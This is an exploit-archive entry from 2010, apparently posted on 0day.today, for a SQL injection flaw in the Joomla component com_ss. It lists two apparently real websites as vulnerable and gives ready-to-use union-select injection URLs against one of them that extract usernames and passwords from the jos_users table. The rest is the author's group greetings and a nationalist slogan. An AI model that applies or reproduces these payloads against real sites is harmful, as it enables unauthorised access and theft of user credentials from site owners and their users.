Joomla Component com_ss Sql Injection Vulnerability

2010-08-11T00:00:00
ID 1337DAY-ID-13657
Type zdt
Reporter _aL_bayraqim_
Modified 2010-08-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===================================================
Joomla Component com_ss Sql Injection Vulnerability 
===================================================

# Exploit Title : Joomla "com_ss" Sql Injection Vulnerability
# Date : 10- 8 - 2010
#
# Author : _aL_bayraqim_
# www.1923turk.com
# BORDO BERELщLER GRUP KOMUTANLIGI [..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!]
############################################################
Dork = :S
############################################################
--- SQL Injection Vulenrability ---
SQL Injection Vulenrability component "com_ss"
http://rozoviykrolik.net/index.php?option=com_ss&view=subcategory&id=1646277829[SQL]
http://sexpompa.ru/index.php?option=com_ss&view=subcategory&id=2800733730&page=2[ Blind]
############################################################
===[ Exploit ]===
# http://rozoviykrolik.net/index.php?option=com_ss&view=subcategory&id=-1646277829+union+select+1,2,3+from+jos_users--

# http://rozoviykrolik.net/index.php?option=com_ss&view=subcategory&id=-1646277829+union+select+concat_ws(0x3a,username,password),2,3+from+jos_users--
############################################################
#.TЭrk oПlu, !!..TЭrk kЩzЩ !!..TЭrklЭgЭnЭ Koru!..
############################################################



#  0day.today [2018-01-06]  #